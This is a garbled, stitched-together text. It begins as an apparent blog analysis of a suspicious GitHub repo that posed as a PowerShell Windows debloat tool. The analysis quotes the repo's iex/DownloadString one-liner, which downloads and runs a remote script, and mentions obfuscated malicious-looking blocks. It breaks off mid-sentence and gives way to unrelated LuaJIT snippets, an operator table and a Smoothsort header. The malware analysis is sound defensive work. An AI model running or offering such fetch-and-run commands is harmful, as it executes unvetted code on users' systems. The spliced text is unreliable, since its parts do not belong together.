Nonlinearsound

The goal

The public repo https://github.com/windowtoolbox/under_observation (the original name was changed by github as the repo is now under observation and all repo files are unaccessible) looked like providing a Powershell script that will optimize and debloat your Windows installation. Strange enough the actual script was not included in the repo as a file but just as a download link in the readme file of the repo. It was all quite suspicious. The installation instruction was the typical iex instruction like this:

iex((New-Object System.Net.WebClient).DownloadString('https://link-to-the-scriptfile'))

Downloading the script by hand gives us a Powershell script with a lot of instructions that actually do what the script pretended to do, they change a lot of system parameters for optimization and de-install software for debloating Windows.

But beside that code there are two blocks of obfuscated code that looked suspicious - well they are obfuscated so you wouldn't expect them to contain

LPGhatguy

local bit = require("bit")

-- Operators that can stay as-is
local natop = {
	["+"] = true,
	["-"] = true,
	["*"] = true,
	["/"] = true
}

ladc

-- This is the LuaJIT implementation of Smoothsort [1], a comparison-based
-- sorting algorithm with worst-case asymptotic O(n log n) behaviour, best-case
-- O(n) behaviour, and a smooth transition in between. Largely based on the C++
-- code by Keith Schwarz [2], translated to LuaJIT by Lesley De Cruz.

-- [1] Dijkstra, E. W. (1982). Smoothsort, an alternative for sorting in situ.
-- Science of Computer Programming, 1(3), 223-233.  
-- [2] Schwarz, K. Smoothsort demystified. http://www.keithschwarz.com/smoothsort/.

local ffi = require("ffi")